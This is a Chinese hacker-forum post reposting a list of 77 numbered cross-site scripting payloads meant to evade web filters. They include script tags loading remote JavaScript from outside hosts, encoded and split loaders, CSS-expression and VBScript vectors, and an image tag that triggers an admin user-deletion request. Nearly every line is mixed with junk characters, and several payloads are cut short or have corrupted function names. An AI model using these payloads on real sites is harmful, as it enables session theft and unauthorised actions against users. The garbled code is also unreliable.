貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。* [, h) \* J( h! F% z
(1)普通的XSS JavaScript注入
( U6 _/ a" @. f$ d) q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 n4 ^6 }+ y2 W ?9 ~(2)IMG标签XSS使用JavaScript命令. ]. Y2 M1 e; t0 p+ R) v3 h. Q$ _2 Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 E7 c. K$ c: A1 c$ \) n(3)IMG标签无分号无引号
3 B ^4 D8 v- S<IMG SRC=javascript:alert(‘XSS’)>
6 B/ Y) W( e# B9 F& X# I% p }(4)IMG标签大小写不敏感( y, r# Y! P1 m: k% D
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% @, k+ Y- H: }(5)HTML编码(必须有分号)
% d* }1 B& R) m+ E<IMG SRC=javascript:alert(“XSS”)>
3 ~0 W& h5 n9 X2 f- r(6)修正缺陷IMG标签8 ]* a2 y4 ~2 J$ [% [# E, z& \
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 Y+ P& j! G2 M; N" L7 n
, v0 @; y) a8 ]2 Y6 M' `) g; n7 r0 `0 N+ v
(7)formCharCode标签(计算器)
- n. Y. ~( H+ l/ A) S' w<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>+ s0 ~( I- z: I4 T
(8)UTF-8的Unicode编码(计算器)
$ |& e( u2 c6 ^/ T$ a3 y" |<IMG SRC=jav..省略..S')>+ r' [) m, _) X3 i a2 {
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 n6 h- i- x: h. e0 u<IMG SRC=jav..省略..S')>8 v! b- G/ K6 Q
(10)十六进制编码也是没有分号(计算器)0 S% b. U3 F. A1 f- J8 i6 k
<IMG SRC=java..省略..XSS')>+ b. O, g' B" ~7 r$ x! y; i ~" @
(11)嵌入式标签,将Javascript分开, [7 m/ T7 h9 j
<IMG SRC=”jav ascript:alert(‘XSS’);”>- `& z4 w4 t) L/ c- y& o; {2 [1 s
(12)嵌入式编码标签,将Javascript分开/ K; e# U: H9 ]! i5 \4 T% v
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 r, N2 G# ?" O4 }$ R' Q2 U
(13)嵌入式换行符
3 p1 e! P9 ^: A( _% B& h<IMG SRC=”jav ascript:alert(‘XSS’);”>
; g+ ]3 f0 @) Y4 B(14)嵌入式回车) M* ^0 J9 E: F; `' D6 g- |
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 |# F; ]5 \1 k8 W7 O
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ I1 k. V7 X' Z( L) r ]<IMG SRC=”javascript:alert(‘XSS‘)”>
+ K* ]' k: I- l7 b$ ](16)解决限制字符(要求同页面)/ F; ?( w6 u4 Q/ \
<script>z=’document.’</script>( m' d* j& e4 _% c! r0 M8 z
<script>z=z+’write(“‘</script>
! G$ q! l, C$ e# u7 Z/ _0 i# m<script>z=z+’<script’</script>
, S; Q* Y2 T9 X<script>z=z+’ src=ht’</script>* ~6 K- ~3 Y0 {$ o: F
<script>z=z+’tp://ww’</script>
# b4 y0 t$ }' r9 o7 ~8 h<script>z=z+’w.shell’</script>
8 I$ f" z' O, d6 g<script>z=z+’.net/1.’</script>& e% G6 M. r0 X
<script>z=z+’js></sc’</script>! e1 E7 c- D2 P
<script>z=z+’ript>”)’</script>
' Z* Y8 j6 e; u5 E" f<script>eval_r(z)</script>
8 k8 v. M" M0 p(17)空字符12-7-1 T00LS - Powered by Discuz! Board
I+ Z& k. a1 A0 A5 o J$ c x" Hhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
8 o( ~0 q1 n) k. ]perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 Q7 b) y0 c! ]" z% l+ V _+ W
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
I# F2 o Y) a/ R6 b. w! Eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& v; G3 T8 n6 ?" W0 A4 W
(19)Spaces和meta前的IMG标签) j* h7 N; C% K# {3 X
<IMG SRC=” javascript:alert(‘XSS’);”>$ `& L# a4 b8 h/ i0 A# G' x
(20)Non-alpha-non-digit XSS1 C2 v' m4 O* }/ o( Y: X
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
_3 \% e0 B! _; y; S* A8 ?% V; m(21)Non-alpha-non-digit XSS to 25 q0 N$ b( k F7 }. h1 n$ d
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
" H, R' B7 F; @(22)Non-alpha-non-digit XSS to 31 V$ J3 p, P+ n, v: K
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ N7 I+ N2 r9 Y9 k7 b" s+ d' A/ E2 o
(23)双开括号
/ u# v: Z2 [ j2 M- J7 Y; ?<<SCRIPT>alert(“XSS”);//<</SCRIPT>- E) E' `+ l9 u+ C) W2 c4 Q& I
(24)无结束脚本标记(仅火狐等浏览器) S' w4 C7 W: f) S. S
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 i. N2 V+ F7 t! R# C5 }" ~8 y
(25)无结束脚本标记2% v; m7 Q N0 O0 i
<SCRIPT SRC=//3w.org/XSS/xss.js>; D1 T1 R: a) f( r
(26)半开的HTML/JavaScript XSS& J8 ]' R( U) g: ^% n
<IMG SRC=”javascript:alert(‘XSS’)”
; ~9 N4 s' F8 ?, X& Z! }(27)双开角括号, c4 A- h4 w0 c3 ~- [9 ~# e
<iframe src=http://3w.org/XSS.html <
5 `$ u3 ?) E0 J- J' q(28)无单引号 双引号 分号
) K1 f, M6 }! |# v8 T, Q<SCRIPT>a=/XSS/. I+ s ]/ b& O- B, \/ _0 }: C
alert(a.source)</SCRIPT>
1 S) Y8 q, _& X/ {3 l(29)换码过滤的JavaScript
% z; O) y) E" H( s3 p8 I\”;alert(‘XSS’);//
# }8 R( U' C5 J$ ?(30)结束Title标签
1 x+ ^& ~+ R3 T8 Q* M</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ ~4 y* W: o' Z9 E
(31)Input Image
0 ^ ^" T) J4 u4 I% _<INPUT SRC=”javascript:alert(‘XSS’);”>2 I! w* [1 B0 ]/ M# m5 ^9 P c
(32)BODY Image
: }; l9 C2 m0 ?<BODY BACKGROUND=”javascript:alert(‘XSS’)”>3 c0 Q- O7 K( f% q
(33)BODY标签& D0 E# r# L3 L; I: d
<BODY(‘XSS’)>3 Y$ Y0 \ k0 p7 R+ z
(34)IMG Dynsrc/ d9 n7 B/ Z, x0 r5 y# j0 L
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
Y6 M* d) f1 ](35)IMG Lowsrc
- |% ^# s+ m3 O: b1 d7 F<IMG LOWSRC=”javascript:alert(‘XSS’)”>; \. p' Y) s" {$ b
(36)BGSOUND1 X) M2 R# ]% l! [" [* y" S
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 \. h+ F$ b7 n( M, }2 X8 V(37)STYLE sheet( |; X1 T* P% y8 y( Z
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, m5 K; f; s+ f7 W$ p/ L& l
(38)远程样式表2 F1 b4 u! G5 [, P. ~
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>; C+ T# X' E S
(39)List-style-image(列表式)
( j. L) }% G: c! c<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( P: J! p4 c6 }0 }
(40)IMG VBscript- C) U$ D) v2 }" n; K1 K/ f) S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
e# [ H! R% i. ^- Z7 ]+ J$ m(41)META链接url
# W" Q# ]. K: M/ P; n8 `1 D
, B! O9 n8 {2 \& c) b3 `# o8 U
/ M& M& H0 d( @# i- _# ^1 O; {3 I<META HTTP-EQUIV=”refresh” CONTENT=”0;! O- [1 v" J8 z" O8 B) `1 r
URL=http://;URL=javascript:alert(‘XSS’);”>$ K9 a7 ?9 I- i7 ^6 d# c; ]% h
(42)Iframe
/ e" x/ i0 b- _# }, i<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 @. t& T) m$ d* \* ](43)Frame
1 p9 f8 y3 K, U5 D( b( o) R, v2 J; i<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 U/ N0 [2 c. w, Ohttps://www.t00ls.net/viewthread ... table&tid=15267 3/6- i7 f1 X5 x) y2 a* ~
(44)Table7 x, F6 \, q3 E7 G5 s, L
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! L* E" G0 |" |2 _3 @8 H. ?# S(45)TD
. o% U: e5 l, k7 `<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! T/ K, J- z1 G( e* i. U(46)DIV background-image+ @- v$ A3 }: A
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 c* N8 X. Y$ ^0 @: g [
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
0 h& E" u; P- r, V- c1 t8&13&12288&65279)
- h' g4 D( L B9 p! A<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ p) |) n! y1 C: a* G- Q(48)DIV expression
% b2 I4 d w& r. M2 T& ^<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& `+ T7 s- Q" O# e; r" o" E
(49)STYLE属性分拆表达
' c( n2 }2 K( C. w' ?' J/ u3 u<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>0 T7 @( q8 ^& j# e; W0 V
(50)匿名STYLE(组成:开角号和一个字母开头)
( K3 d5 D/ j8 \( g3 y<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: Y: H$ x, L9 O. Z5 v! V
(51)STYLE background-image0 g8 p3 ?/ n9 p# g4 o! I
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
, S$ @9 u# F0 U* z. p( W( f( B% h$ X! ^CLASS=XSS></A> C$ o: _3 F8 N2 |9 Y
(52)IMG STYLE方式$ V. y0 e) `3 {+ S8 n& r
exppression(alert(“XSS”))’>1 Z3 b/ u4 J7 s; U. K$ [& e7 j) v
(53)STYLE background
9 [) I) x, r- O$ H/ o<STYLE><STYLE
$ U9 B+ d6 |; k5 W$ M1 ^0 N; itype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 G4 ^& P) d; |2 h' J& d9 N& S(54)BASE) g, T% u" b" H6 G T9 q
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 C) T4 }- V. v3 b5 G0 U% F/ Z& w+ I n(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' D" w1 }2 M2 }! r: K# V6 K2 G4 f<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, t* o% ?0 M4 ]$ x1 P& p* c. g, f(56)在flash中使用ActionScrpt可以混进你XSS的代码
" U7 ~/ {; v9 l- N4 {a=”get”;
+ h, A/ F0 e: i3 [b=”URL(\”";' s& ^0 A1 g9 _: w, p' `9 N
c=”javascript:”;3 q. y$ R9 l* y2 y G
d=”alert(‘XSS’);\”)”;
" ~; j: I0 ], j( V0 q6 i; eeval_r(a+b+c+d);
5 P( P. z. F9 j/ b/ ^$ G8 m(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上' ?: E6 I8 g5 v8 _
<HTML xmlns:xss>! _+ L( p7 F5 [1 K
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, s7 P8 I: n0 ^
<xss:xss>XSS</xss:xss>
4 r- o0 u; O6 u T</HTML>
# c2 g" F8 x! r& v5 {1 P! h(58)如果过滤了你的JS你可以在图片里添加JS代码来利用* F$ U8 L( p% w F
<SCRIPT SRC=””></SCRIPT>6 b! O7 F6 P2 A9 N& q3 ]
(59)IMG嵌入式命令,可执行任意命令; `# L$ ^1 Z/ R1 a- g$ g# P
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# M, S* k' e6 {2 l; b4 d(60)IMG嵌入式命令(a.jpg在同服务器)# u! Y9 [1 W- L' }+ t/ q+ a( j" ]
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 v4 `( V, V) K0 L: B8 z(61)绕符号过滤
5 h' Y5 [: B$ s# R. X# M' O5 Z<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
" q! F- ]& N2 W' F% X5 C(62)" e' t; m9 T8 y4 U0 E, A$ d; I
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ \; c: S. x. [ ](63)+ r: R8 ?. h( @7 W4 W: D( H- W
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
/ G. P& {, G7 i3 ?(64)
' M; b- Y' Z, o<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
6 _# h$ p" X) {1 s% `1 V(65)
4 Z1 ~, w9 V7 V<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( u6 r, ^1 s' @6 z- `% `5 r' L(66)12-7-1 T00LS - Powered by Discuz! Board
5 |7 Q+ Q6 i" xhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
5 j. `, Q+ c( F9 G<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& q9 R, f& e1 R
(67)6 R8 g# t+ R, C2 z* F3 p1 i
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
" v* m) Y6 L8 x4 [</SCRIPT>! t- V. o; z! p- i& a: v. _
(68)URL绕行+ D# X: v! ?! W- a7 p3 o
<A HREF=”http://127.0.0.1/”>XSS</A>+ y; H o% d( k$ V
(69)URL编码
) p+ P% k4 W- V7 p ~' o) O d<A HREF=”http://3w.org”>XSS</A>
* U+ Z2 T7 I3 v8 W(70)IP十进制
5 ^: n( A0 h; k4 x1 ]) V5 \<A HREF=”http://3232235521″>XSS</A>$ n3 v* V0 V& C- F7 E+ Y {
(71)IP十六进制# q2 h3 s9 J: h/ Q& Y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
2 t/ q1 B4 R f& V(72)IP八进制
) F0 p# a2 O/ N<A HREF=”http://0300.0250.0000.0001″>XSS</A>
9 r/ ?+ y9 Q+ { q" w% `% H/ x& |(73)混合编码9 z, z% z" J) R& S* Q* x
<A HREF=”h
/ V2 S. B8 q% o. Y4 ^0 att p://6 6.000146.0×7.147/”">XSS</A>* N' V7 _( S& B U4 |+ b
(74)节省[http:]
$ R7 Q \, ^$ T. ~% E<A HREF=”//www.google.com/”>XSS</A>0 u1 W" s* W+ T2 ]+ x$ ~- @% B, c
(75)节省[www]( }6 k( @. ^& V3 ^" U' h
<A HREF=”http://google.com/”>XSS</A>1 r. y) }, F* X4 y2 t& o
(76)绝对点绝对DNS
& n/ o s) b0 n/ w/ n! O" h" W4 F3 H<A HREF=”http://www.google.com./”>XSS</A>
$ W: I" ?8 M0 L N6 p2 E, G(77)javascript链接6 v- P; R! A* }( E% k7 j6 m
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
1 l( Y& ?; d8 c# k3 W
6 D, f+ V* {- @% ]* _原文地址:http://fuzzexp.org/u/0day/?p=143 V) L, f# k4 @9 ^, K7 e$ w1 l* P
0 p: e3 C" G1 q- h1 u: M0 ~ |
发表于 2013-4-19 19:22:37
收藏
支持
反对